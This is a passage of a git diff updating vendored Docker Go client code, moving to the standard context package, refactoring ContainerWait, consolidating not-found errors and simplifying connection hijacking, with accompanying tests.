"encoding/json" "github.com/docker/docker/api/types/container" - "golang.org/x/net/context" ) // ContainerUpdate updates resources of a container diff --git 
a/vendor/github.com/docker/docker/client/container_update_test.go b/vendor/github.com/docker/docker/client/container_update_test.go index 715bb7ca23..41c6485ec8 100644 --- a/vendor/github.com/docker/docker/client/container_update_test.go +++ b/vendor/github.com/docker/docker/client/container_update_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types/container" - "golang.org/x/net/context" ) func TestContainerUpdateError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_wait.go b/vendor/github.com/docker/docker/client/container_wait.go index 93212c70ee..6ab8c1da96 100644 --- a/vendor/github.com/docker/docker/client/container_wait.go +++ b/vendor/github.com/docker/docker/client/container_wait.go @@ -1,26 +1,83 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" - - "golang.org/x/net/context" + "net/url" "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/versions" ) -// ContainerWait pauses execution until a container exits. -// It returns the API status code as response of its readiness. -func (cli *Client) ContainerWait(ctx context.Context, containerID string) (int64, error) { - resp, err := cli.post(ctx, "/containers/"+containerID+"/wait", nil, nil, nil) - if err != nil { - return -1, err +// ContainerWait waits until the specified container is in a certain state +// indicated by the given condition, either "not-running" (default), +// "next-exit", or "removed". +// +// If this client's API version is before 1.30, condition is ignored and +// ContainerWait will return immediately with the two channels, as the server +// will wait as if the condition were "not-running". 
+// +// If this client's API version is at least 1.30, ContainerWait blocks until +// the request has been acknowledged by the server (with a response header), +// then returns two channels on which the caller can wait for the exit status +// of the container or an error if there was a problem either beginning the +// wait request or in getting the response. This allows the caller to +// synchronize ContainerWait with other calls, such as specifying a +// "next-exit" condition before issuing a ContainerStart request. +func (cli *Client) ContainerWait(ctx context.Context, containerID string, condition container.WaitCondition) (<-chan container.ContainerWaitOKBody, <-chan error) { + if versions.LessThan(cli.ClientVersion(), "1.30") { + return cli.legacyContainerWait(ctx, containerID) } - defer ensureReaderClosed(resp) - var res container.ContainerWaitOKBody - if err := json.NewDecoder(resp.body).Decode(&res); err != nil { - return -1, err + resultC := make(chan container.ContainerWaitOKBody) + errC := make(chan error, 1) + + query := url.Values{} + query.Set("condition", string(condition)) + + resp, err := cli.post(ctx, "/containers/"+containerID+"/wait", query, nil, nil) + if err != nil { + defer ensureReaderClosed(resp) + errC <- err + return resultC, errC } - return res.StatusCode, nil + go func() { + defer ensureReaderClosed(resp) + var res container.ContainerWaitOKBody + if err := json.NewDecoder(resp.body).Decode(&res); err != nil { + errC <- err + return + } + + resultC <- res + }() + + return resultC, errC +} + +// legacyContainerWait returns immediately and doesn't have an option to wait +// until the container is removed. 
+func (cli *Client) legacyContainerWait(ctx context.Context, containerID string) (<-chan container.ContainerWaitOKBody, <-chan error) { + resultC := make(chan container.ContainerWaitOKBody) + errC := make(chan error) + + go func() { + resp, err := cli.post(ctx, "/containers/"+containerID+"/wait", nil, nil, nil) + if err != nil { + errC <- err + return + } + defer ensureReaderClosed(resp) + + var res container.ContainerWaitOKBody + if err := json.NewDecoder(resp.body).Decode(&res); err != nil { + errC <- err + return + } + + resultC <- res + }() + + return resultC, errC } diff --git a/vendor/github.com/docker/docker/client/container_wait_test.go b/vendor/github.com/docker/docker/client/container_wait_test.go index 9300bc0a54..11a9203ddc 100644 --- a/vendor/github.com/docker/docker/client/container_wait_test.go +++ b/vendor/github.com/docker/docker/client/container_wait_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -12,20 +13,20 @@ import ( "time" "github.com/docker/docker/api/types/container" - - "golang.org/x/net/context" ) func TestContainerWaitError(t *testing.T) { client := &Client{ client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } - code, err := client.ContainerWait(context.Background(), "nothing") - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) - } - if code != -1 { - t.Fatalf("expected a status code equal to '-1', got %d", code) + resultC, errC := client.ContainerWait(context.Background(), "nothing", "") + select { + case result := <-resultC: + t.Fatalf("expected to not get a wait result, got %d", result.StatusCode) + case err := <-errC: + if err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } } } @@ -49,12 +50,14 @@ func TestContainerWait(t *testing.T) { }), } - 
code, err := client.ContainerWait(context.Background(), "container_id") - if err != nil { + resultC, errC := client.ContainerWait(context.Background(), "container_id", "") + select { + case err := <-errC: t.Fatal(err) - } - if code != 15 { - t.Fatalf("expected a status code equal to '15', got %d", code) + case result := <-resultC: + if result.StatusCode != 15 { + t.Fatalf("expected a status code equal to '15', got %d", result.StatusCode) + } } } @@ -63,8 +66,8 @@ func ExampleClient_ContainerWait_withTimeout() { defer cancel() client, _ := NewEnvClient() - _, err := client.ContainerWait(ctx, "container_id") - if err != nil { + _, errC := client.ContainerWait(ctx, "container_id", "") + if err := <-errC; err != nil { log.Fatal(err) } } diff --git a/vendor/github.com/docker/docker/client/disk_usage.go b/vendor/github.com/docker/docker/client/disk_usage.go index 03c80b39af..8eb30eb5de 100644 --- a/vendor/github.com/docker/docker/client/disk_usage.go +++ b/vendor/github.com/docker/docker/client/disk_usage.go @@ -1,11 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "fmt" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // DiskUsage requests the current data usage from the daemon diff --git a/vendor/github.com/docker/docker/client/disk_usage_test.go b/vendor/github.com/docker/docker/client/disk_usage_test.go new file mode 100644 index 0000000000..3968f75e62 --- /dev/null +++ b/vendor/github.com/docker/docker/client/disk_usage_test.go @@ -0,0 +1,55 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" +) + +func TestDiskUsageError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.DiskUsage(context.Background()) + if err == nil || 
err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestDiskUsage(t *testing.T) { + expectedURL := "/system/df" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + du := types.DiskUsage{ + LayersSize: int64(100), + Images: nil, + Containers: nil, + Volumes: nil, + } + + b, err := json.Marshal(du) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + if _, err := client.DiskUsage(context.Background()); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/distribution_inspect.go b/vendor/github.com/docker/docker/client/distribution_inspect.go new file mode 100644 index 0000000000..7245bbeeda --- /dev/null +++ b/vendor/github.com/docker/docker/client/distribution_inspect.go @@ -0,0 +1,38 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "encoding/json" + "net/url" + + registrytypes "github.com/docker/docker/api/types/registry" +) + +// DistributionInspect returns the image digest with full Manifest +func (cli *Client) DistributionInspect(ctx context.Context, image, encodedRegistryAuth string) (registrytypes.DistributionInspect, error) { + // Contact the registry to retrieve digest and platform information + var distributionInspect registrytypes.DistributionInspect + if image == "" { + return distributionInspect, objectNotFoundError{object: "distribution", id: image} + } + + if err := cli.NewVersionError("1.30", "distribution inspect"); err != nil { + return distributionInspect, err + } + var headers map[string][]string + + if encodedRegistryAuth != "" { + headers = map[string][]string{ + "X-Registry-Auth": {encodedRegistryAuth}, + } + } + 
+ resp, err := cli.get(ctx, "/distribution/"+image+"/json", url.Values{}, headers) + if err != nil { + return distributionInspect, err + } + + err = json.NewDecoder(resp.body).Decode(&distributionInspect) + ensureReaderClosed(resp) + return distributionInspect, err +} diff --git a/vendor/github.com/docker/docker/client/distribution_inspect_test.go b/vendor/github.com/docker/docker/client/distribution_inspect_test.go new file mode 100644 index 0000000000..a23d5f55d5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/distribution_inspect_test.go @@ -0,0 +1,32 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "net/http" + "testing" + + "github.com/pkg/errors" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestDistributionInspectUnsupported(t *testing.T) { + client := &Client{ + version: "1.29", + client: &http.Client{}, + } + _, err := client.DistributionInspect(context.Background(), "foobar:1.0", "") + assert.Check(t, is.Error(err, `"distribution inspect" requires API version 1.30, but the Docker daemon API version is 1.29`)) +} + +func TestDistributionInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, err := client.DistributionInspect(context.Background(), "", "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) + } +} diff --git a/vendor/github.com/docker/docker/client/errors.go b/vendor/github.com/docker/docker/client/errors.go index bf6923f134..0461af329d 100644 --- a/vendor/github.com/docker/docker/client/errors.go +++ b/vendor/github.com/docker/docker/client/errors.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "fmt" + "net/http" "github.com/docker/docker/api/types/versions" "github.com/pkg/errors" @@ -36,95 +37,37 @@ type notFound interface { NotFound() bool // Is the 
error a NotFound error } -// IsErrNotFound returns true if the error is caused with an -// object (image, container, network, volume, …) is not found in the docker host. +// IsErrNotFound returns true if the error is a NotFound error, which is returned +// by the API when some object is not found. func IsErrNotFound(err error) bool { te, ok := err.(notFound) return ok && te.NotFound() } -// imageNotFoundError implements an error returned when an image is not in the docker host. -type imageNotFoundError struct { - imageID string +type objectNotFoundError struct { + object string + id string } -// NotFound indicates that this error type is of NotFound -func (e imageNotFoundError) NotFound() bool { +func (e objectNotFoundError) NotFound() bool { return true } -// Error returns a string representation of an imageNotFoundError -func (e imageNotFoundError) Error() string { - return fmt.Sprintf("Error: No such image: %s", e.imageID) +func (e objectNotFoundError) Error() string { + return fmt.Sprintf("Error: No such %s: %s", e.object, e.id) } -// IsErrImageNotFound returns true if the error is caused -// when an image is not found in the docker host. -func IsErrImageNotFound(err error) bool { - return IsErrNotFound(err) -} - -// containerNotFoundError implements an error returned when a container is not in the docker host. -type containerNotFoundError struct { - containerID string -} - -// NotFound indicates that this error type is of NotFound -func (e containerNotFoundError) NotFound() bool { - return true -} - -// Error returns a string representation of a containerNotFoundError -func (e containerNotFoundError) Error() string { - return fmt.Sprintf("Error: No such container: %s", e.containerID) -} - -// IsErrContainerNotFound returns true if the error is caused -// when a container is not found in the docker host. 
-func IsErrContainerNotFound(err error) bool { - return IsErrNotFound(err) -} - -// networkNotFoundError implements an error returned when a network is not in the docker host. -type networkNotFoundError struct { - networkID string -} - -// NotFound indicates that this error type is of NotFound -func (e networkNotFoundError) NotFound() bool { - return true -} - -// Error returns a string representation of a networkNotFoundError -func (e networkNotFoundError) Error() string { - return fmt.Sprintf("Error: No such network: %s", e.networkID) -} - -// IsErrNetworkNotFound returns true if the error is caused -// when a network is not found in the docker host. -func IsErrNetworkNotFound(err error) bool { - return IsErrNotFound(err) -} - -// volumeNotFoundError implements an error returned when a volume is not in the docker host. -type volumeNotFoundError struct { - volumeID string -} - -// NotFound indicates that this error type is of NotFound -func (e volumeNotFoundError) NotFound() bool { - return true -} - -// Error returns a string representation of a volumeNotFoundError -func (e volumeNotFoundError) Error() string { - return fmt.Sprintf("Error: No such volume: %s", e.volumeID) -} - -// IsErrVolumeNotFound returns true if the error is caused -// when a volume is not found in the docker host. -func IsErrVolumeNotFound(err error) bool { - return IsErrNotFound(err) +func wrapResponseError(err error, resp serverResponse, object, id string) error { + switch { + case err == nil: + return nil + case resp.statusCode == http.StatusNotFound: + return objectNotFoundError{object: object, id: id} + case resp.statusCode == http.StatusNotImplemented: + return notImplementedError{message: err.Error()} + default: + return err + } } // unauthorizedError represents an authorization error in a remote registry. @@ -144,72 +87,6 @@ func IsErrUnauthorized(err error) bool { return ok } -// nodeNotFoundError implements an error returned when a node is not found. 
-type nodeNotFoundError struct { - nodeID string -} - -// Error returns a string representation of a nodeNotFoundError -func (e nodeNotFoundError) Error() string { - return fmt.Sprintf("Error: No such node: %s", e.nodeID) -} - -// NotFound indicates that this error type is of NotFound -func (e nodeNotFoundError) NotFound() bool { - return true -} - -// IsErrNodeNotFound returns true if the error is caused -// when a node is not found. -func IsErrNodeNotFound(err error) bool { - _, ok := err.(nodeNotFoundError) - return ok -} - -// serviceNotFoundError implements an error returned when a service is not found. -type serviceNotFoundError struct { - serviceID string -} - -// Error returns a string representation of a serviceNotFoundError -func (e serviceNotFoundError) Error() string { - return fmt.Sprintf("Error: No such service: %s", e.serviceID) -} - -// NotFound indicates that this error type is of NotFound -func (e serviceNotFoundError) NotFound() bool { - return true -} - -// IsErrServiceNotFound returns true if the error is caused -// when a service is not found. -func IsErrServiceNotFound(err error) bool { - _, ok := err.(serviceNotFoundError) - return ok -} - -// taskNotFoundError implements an error returned when a task is not found. -type taskNotFoundError struct { - taskID string -} - -// Error returns a string representation of a taskNotFoundError -func (e taskNotFoundError) Error() string { - return fmt.Sprintf("Error: No such task: %s", e.taskID) -} - -// NotFound indicates that this error type is of NotFound -func (e taskNotFoundError) NotFound() bool { - return true -} - -// IsErrTaskNotFound returns true if the error is caused -// when a task is not found. 
-func IsErrTaskNotFound(err error) bool { - _, ok := err.(taskNotFoundError) - return ok -} - type pluginPermissionDenied struct { name string } @@ -225,54 +102,31 @@ func IsErrPluginPermissionDenied(err error) bool { return ok } -// NewVersionError returns an error if the APIVersion required -// if less than the current supported version -func (cli *Client) NewVersionError(APIrequired, feature string) error { - if versions.LessThan(cli.version, APIrequired) { - return fmt.Errorf("%q requires API version %s, but the Docker server is version %s", feature, APIrequired, cli.version) - } - return nil -} - -// secretNotFoundError implements an error returned when a secret is not found. -type secretNotFoundError struct { - name string -} - -// Error returns a string representation of a secretNotFoundError -func (e secretNotFoundError) Error() string { - return fmt.Sprintf("Error: no such secret: %s", e.name) -} - -// NoFound indicates that this error type is of NotFound -func (e secretNotFoundError) NotFound() bool { - return true +type notImplementedError struct { + message string } -// IsErrSecretNotFound returns true if the error is caused -// when a secret is not found. -func IsErrSecretNotFound(err error) bool { - _, ok := err.(secretNotFoundError) - return ok -} - -// pluginNotFoundError implements an error returned when a plugin is not in the docker host. -type pluginNotFoundError struct { - name string +func (e notImplementedError) Error() string { + return e.message } -// NotFound indicates that this error type is of NotFound -func (e pluginNotFoundError) NotFound() bool { +func (e notImplementedError) NotImplemented() bool { return true } -// Error returns a string representation of a pluginNotFoundError -func (e pluginNotFoundError) Error() string { - return fmt.Sprintf("Error: No such plugin: %s", e.name) +// IsErrNotImplemented returns true if the error is a NotImplemented error. 
+// This is returned by the API when a requested feature has not been +// implemented. +func IsErrNotImplemented(err error) bool { + te, ok := err.(notImplementedError) + return ok && te.NotImplemented() } -// IsErrPluginNotFound returns true if the error is caused -// when a plugin is not found in the docker host. -func IsErrPluginNotFound(err error) bool { - return IsErrNotFound(err) +// NewVersionError returns an error if the APIVersion required +// if less than the current supported version +func (cli *Client) NewVersionError(APIrequired, feature string) error { + if cli.version != "" && versions.LessThan(cli.version, APIrequired) { + return fmt.Errorf("%q requires API version %s, but the Docker daemon API version is %s", feature, APIrequired, cli.version) + } + return nil } diff --git a/vendor/github.com/docker/docker/client/events.go b/vendor/github.com/docker/docker/client/events.go index af47aefa74..6e56538955 100644 --- a/vendor/github.com/docker/docker/client/events.go +++ b/vendor/github.com/docker/docker/client/events.go @@ -1,12 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "time" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/events" "github.com/docker/docker/api/types/filters" diff --git a/vendor/github.com/docker/docker/client/events_test.go b/vendor/github.com/docker/docker/client/events_test.go index ba82d2f542..4a39901b45 100644 --- a/vendor/github.com/docker/docker/client/events_test.go +++ b/vendor/github.com/docker/docker/client/events_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io" @@ -10,8 +11,6 @@ import ( "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/events" "github.com/docker/docker/api/types/filters" diff --git 
a/vendor/github.com/docker/docker/client/hijack.go b/vendor/github.com/docker/docker/client/hijack.go index 74c53f52b3..35f5dd86dc 100644 --- a/vendor/github.com/docker/docker/client/hijack.go +++ b/vendor/github.com/docker/docker/client/hijack.go @@ -1,37 +1,21 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "bufio" + "context" "crypto/tls" - "errors" "fmt" "net" "net/http" "net/http/httputil" "net/url" - "strings" "time" "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/tlsconfig" "github.com/docker/go-connections/sockets" - "golang.org/x/net/context" + "github.com/pkg/errors" ) -// tlsClientCon holds tls information and a dialed connection. -type tlsClientCon struct { - *tls.Conn - rawConn net.Conn -} - -func (c *tlsClientCon) CloseWrite() error { - // Go standard tls.Conn doesn't provide the CloseWrite() method so we do it - // on its underlying connection. - if conn, ok := c.rawConn.(types.CloseWriter); ok { - return conn.CloseWrite() - } - return nil -} - // postHijacked sends a POST request and hijacks the connection. 
func (cli *Client) postHijacked(ctx context.Context, path string, query url.Values, body interface{}, headers map[string][]string) (types.HijackedResponse, error) { bodyEncoded, err := encodeData(body) @@ -46,16 +30,32 @@ func (cli *Client) postHijacked(ctx context.Context, path string, query url.Valu } req = cli.addHeaders(req, headers) + conn, err := cli.setupHijackConn(req, "tcp") + if err != nil { + return types.HijackedResponse{}, err + } + + return types.HijackedResponse{Conn: conn, Reader: bufio.NewReader(conn)}, err +} + +func dial(proto, addr string, tlsConfig *tls.Config) (net.Conn, error) { + if tlsConfig != nil && proto != "unix" && proto != "npipe" { + return tls.Dial(proto, addr, tlsConfig) + } + if proto == "npipe" { + return sockets.DialPipe(addr, 32*time.Second) + } + return net.Dial(proto, addr) +} + +func (cli *Client) setupHijackConn(req *http.Request, proto string) (net.Conn, error) { req.Host = cli.addr req.Header.Set("Connection", "Upgrade") - req.Header.Set("Upgrade", "tcp") + req.Header.Set("Upgrade", proto) conn, err := dial(cli.proto, cli.addr, resolveTLSConfig(cli.client.Transport)) if err != nil { - if strings.Contains(err.Error(), "connection refused") { - return types.HijackedResponse{}, fmt.Errorf("Cannot connect to the Docker daemon. Is 'docker daemon' running on this host?") - } - return types.HijackedResponse{}, err + return nil, errors.Wrap(err, "cannot connect to the Docker daemon. 
Is 'docker daemon' running on this host?") } // When we set up a TCP connection for hijack, there could be long periods @@ -72,106 +72,58 @@ func (cli *Client) postHijacked(ctx context.Context, path string, query url.Valu defer clientconn.Close() // Server hijacks the connection, error 'connection closed' expected - _, err = clientconn.Do(req) - - rwc, br := clientconn.Hijack() - - return types.HijackedResponse{Conn: rwc, Reader: br}, err -} - -func tlsDial(network, addr string, config *tls.Config) (net.Conn, error) { - return tlsDialWithDialer(new(net.Dialer), network, addr, config) -} - -// We need to copy Go's implementation of tls.Dial (pkg/cryptor/tls/tls.go) in -// order to return our custom tlsClientCon struct which holds both the tls.Conn -// object _and_ its underlying raw connection. The rationale for this is that -// we need to be able to close the write end of the connection when attaching, -// which tls.Conn does not provide. -func tlsDialWithDialer(dialer *net.Dialer, network, addr string, config *tls.Config) (net.Conn, error) { - // We want the Timeout and Deadline values from dialer to cover the - // whole process: TCP connection and TLS handshake. This means that we - // also need to start our own timers now. 
- timeout := dialer.Timeout - - if !dialer.Deadline.IsZero() { - deadlineTimeout := dialer.Deadline.Sub(time.Now()) - if timeout == 0 || deadlineTimeout < timeout { - timeout = deadlineTimeout + resp, err := clientconn.Do(req) + if err != httputil.ErrPersistEOF { + if err != nil { + return nil, err + } + if resp.StatusCode != http.StatusSwitchingProtocols { + resp.Body.Close() + return nil, fmt.Errorf("unable to upgrade to %s, received %d", proto, resp.StatusCode) } } - var errChannel chan error - - if timeout != 0 { - errChannel = make(chan error, 2) - time.AfterFunc(timeout, func() { - errChannel <- errors.New("") - }) - } - - proxyDialer, err := sockets.DialerFromEnvironment(dialer) - if err != nil { - return nil, err - } - - rawConn, err := proxyDialer.Dial(network, addr) - if err != nil { - return nil, err - } - // When we set up a TCP connection for hijack, there could be long periods - // of inactivity (a long running command with no output) that in certain - // network setups may cause ECONNTIMEOUT, leaving the client in an unknown - // state. Setting TCP KeepAlive on the socket connection will prohibit - // ECONNTIMEOUT unless the socket connection truly is broken - if tcpConn, ok := rawConn.(*net.TCPConn); ok { - tcpConn.SetKeepAlive(true) - tcpConn.SetKeepAlivePeriod(30 * time.Second) - } - - colonPos := strings.LastIndex(addr, ":") - if colonPos == -1 { - colonPos = len(addr) - } - hostname := addr[:colonPos] - - // If no ServerName is set, infer the ServerName - // from the hostname we're connecting to. - if config.ServerName == "" { - // Make a copy to avoid polluting argument or default. - config = tlsconfig.Clone(config) - config.ServerName = hostname + c, br := clientconn.Hijack() + if br.Buffered() > 0 { + // If there is buffered content, wrap the connection. We return an + // object that implements CloseWrite iff the underlying connection + // implements it. 
+ if _, ok := c.(types.CloseWriter); ok { + c = &hijackedConnCloseWriter{&hijackedConn{c, br}} + } else { + c = &hijackedConn{c, br} + } + } else { + br.Reset(nil) } - conn := tls.Client(rawConn, config) - - if timeout == 0 { - err = conn.Handshake() - } else { - go func() { - errChannel <- conn.Handshake() - }() + return c, nil +} - err = <-errChannel - } +// hijackedConn wraps a net.Conn and is returned by setupHijackConn in the case +// that a) there was already buffered data in the http layer when Hijack() was +// called, and b) the underlying net.Conn does *not* implement CloseWrite(). +// hijackedConn does not implement CloseWrite() either. +type hijackedConn struct { + net.Conn + r *bufio.Reader +} - if err != nil { - rawConn.Close() - return nil, err - } +func (c *hijackedConn) Read(b []byte) (int, error) { + return c.r.Read(b) +} - // This is Docker difference with standard's crypto/tls package: returned a - // wrapper which holds both the TLS and raw connections. - return &tlsClientCon{conn, rawConn}, nil +// hijackedConnCloseWriter is a hijackedConn which additionally implements +// CloseWrite(). It is returned by setupHijackConn in the case that a) there +// was already buffered data in the http layer when Hijack() was called, and b) +// the underlying net.Conn *does* implement CloseWrite(). 
+type hijackedConnCloseWriter struct { + *hijackedConn } -func dial(proto, addr string, tlsConfig *tls.Config) (net.Conn, error) { - if tlsConfig != nil && proto != "unix" && proto != "npipe" { - // Notice this isn't Go standard's tls.Dial function - return tlsDial(proto, addr, tlsConfig) - } - if proto == "npipe" { - return sockets.DialPipe(addr, 32*time.Second) - } - return net.Dial(proto, addr) +var _ types.CloseWriter = &hijackedConnCloseWriter{} + +func (c *hijackedConnCloseWriter) CloseWrite() error { + conn := c.Conn.(types.CloseWriter) + return conn.CloseWrite() } diff --git a/vendor/github.com/docker/docker/client/hijack_test.go b/vendor/github.com/docker/docker/client/hijack_test.go new file mode 100644 index 0000000000..823bf344f5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/hijack_test.go @@ -0,0 +1,103 @@ +package client + +import ( + "fmt" + "io/ioutil" + "net" + "net/http" + "net/http/httptest" + "net/url" + "testing" + + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/pkg/errors" + "golang.org/x/net/context" + "gotest.tools/assert" +) + +func TestTLSCloseWriter(t *testing.T) { + t.Parallel() + + var chErr chan error + ts := &httptest.Server{Config: &http.Server{Handler: http.HandlerFunc(func(w http.ResponseWriter, req *http.Request) { + chErr = make(chan error, 1) + defer close(chErr) + if err := httputils.ParseForm(req); err != nil { + chErr <- errors.Wrap(err, "error parsing form") + http.Error(w, err.Error(), 500) + return + } + r, rw, err := httputils.HijackConnection(w) + if err != nil { + chErr <- errors.Wrap(err, "error hijacking connection") + http.Error(w, err.Error(), 500) + return + } + defer r.Close() + + fmt.Fprint(rw, "HTTP/1.1 101 UPGRADED\r\nContent-Type: application/vnd.docker.raw-stream\r\nConnection: Upgrade\r\nUpgrade: tcp\r\n\n") + + buf := make([]byte, 5) + _, err = r.Read(buf) + if err != nil { + chErr <- errors.Wrap(err, "error reading from client") + return + 
} + _, err = rw.Write(buf) + if err != nil { + chErr <- errors.Wrap(err, "error writing to client") + return + } + })}} + + var ( + l net.Listener + err error + ) + for i := 1024; i < 10000; i++ { + l, err = net.Listen("tcp4", fmt.Sprintf("127.0.0.1:%d", i)) + if err == nil { + break + } + } + assert.Assert(t, err) + + ts.Listener = l + defer l.Close() + + defer func() { + if chErr != nil { + assert.Assert(t, <-chErr) + } + }() + + ts.StartTLS() + defer ts.Close() + + serverURL, err := url.Parse(ts.URL) + assert.Assert(t, err) + + client, err := NewClient("tcp://"+serverURL.Host, "", ts.Client(), nil) + assert.Assert(t, err) + + resp, err := client.postHijacked(context.Background(), "/asdf", url.Values{}, nil, map[string][]string{"Content-Type": {"text/plain"}}) + assert.Assert(t, err) + defer resp.Close() + + if _, ok := resp.Conn.(types.CloseWriter); !ok { + t.Fatal("tls conn did not implement the CloseWrite interface") + } + + _, err = resp.Conn.Write([]byte("hello")) + assert.Assert(t, err) + + b, err := ioutil.ReadAll(resp.Reader) + assert.Assert(t, err) + assert.Assert(t, string(b) == "hello") + assert.Assert(t, resp.CloseWrite()) + + // This should error since writes are closed + _, err = resp.Conn.Write([]byte("no")) + assert.Assert(t, err != nil) +} diff --git a/vendor/github.com/docker/docker/client/image_build.go b/vendor/github.com/docker/docker/client/image_build.go index 6fde75dcfd..dff19b989f 100644 --- a/vendor/github.com/docker/docker/client/image_build.go +++ b/vendor/github.com/docker/docker/client/image_build.go @@ -1,14 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/base64" "encoding/json" "io" "net/http" "net/url" "strconv" - - "golang.org/x/net/context" + "strings" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/container" @@ -29,7 +29,14 @@ func (cli *Client) ImageBuild(ctx context.Context, buildContext io.Reader, optio return 
types.ImageBuildResponse{}, err } headers.Add("X-Registry-Config", base64.URLEncoding.EncodeToString(buf)) - headers.Set("Content-Type", "application/tar") + + if options.Platform != "" { + if err := cli.NewVersionError("1.32", "platform"); err != nil { + return types.ImageBuildResponse{}, err + } + query.Set("platform", options.Platform) + } + headers.Set("Content-Type", "application/x-tar") serverResp, err := cli.postRaw(ctx, "/build", query, buildContext, headers) if err != nil { @@ -48,6 +55,7 @@ func (cli *Client) imageBuildOptionsToQuery(options types.ImageBuildOptions) (ur query := url.Values{ "t": options.Tags, "securityopt": options.SecurityOpt, + "extrahosts": options.ExtraHosts, } if options.SuppressOutput { query.Set("q", "1") @@ -94,6 +102,7 @@ func (cli *Client) imageBuildOptionsToQuery(options types.ImageBuildOptions) (ur query.Set("cgroupparent", options.CgroupParent) query.Set("shmsize", strconv.FormatInt(options.ShmSize, 10)) query.Set("dockerfile", options.Dockerfile) + query.Set("target", options.Target) ulimitsJSON, err := json.Marshal(options.Ulimits) if err != nil { @@ -118,6 +127,15 @@ func (cli *Client) imageBuildOptionsToQuery(options types.ImageBuildOptions) (ur return query, err } query.Set("cachefrom", string(cacheFromJSON)) - + if options.SessionID != "" { + query.Set("session", options.SessionID) + } + if options.Platform != "" { + query.Set("platform", strings.ToLower(options.Platform)) + } + if options.BuildID != "" { + query.Set("buildid", options.BuildID) + } + query.Set("version", string(options.Version)) return query, nil } diff --git a/vendor/github.com/docker/docker/client/image_build_test.go b/vendor/github.com/docker/docker/client/image_build_test.go index b9d04f817a..95c11bc3e5 100644 --- a/vendor/github.com/docker/docker/client/image_build_test.go +++ b/vendor/github.com/docker/docker/client/image_build_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + 
"context" "fmt" "io/ioutil" "net/http" @@ -9,8 +10,6 @@ import ( "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/container" "github.com/docker/go-units" @@ -170,8 +169,8 @@ func TestImageBuild(t *testing.T) { return nil, fmt.Errorf("X-Registry-Config header not properly set in the request. Expected '%s', got %s", buildCase.expectedRegistryConfig, registryConfig) } contentType := r.Header.Get("Content-Type") - if contentType != "application/tar" { - return nil, fmt.Errorf("Content-type header not properly set in the request. Expected 'application/tar', got %s", contentType) + if contentType != "application/x-tar" { + return nil, fmt.Errorf("Content-type header not properly set in the request. Expected 'application/x-tar', got %s", contentType) } // Check query parameters diff --git a/vendor/github.com/docker/docker/client/image_create.go b/vendor/github.com/docker/docker/client/image_create.go index cf023a7186..239380474e 100644 --- a/vendor/github.com/docker/docker/client/image_create.go +++ b/vendor/github.com/docker/docker/client/image_create.go @@ -1,26 +1,29 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/url" + "strings" - "golang.org/x/net/context" - + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/reference" ) // ImageCreate creates a new image based in the parent options. // It returns the JSON content in the response body. 
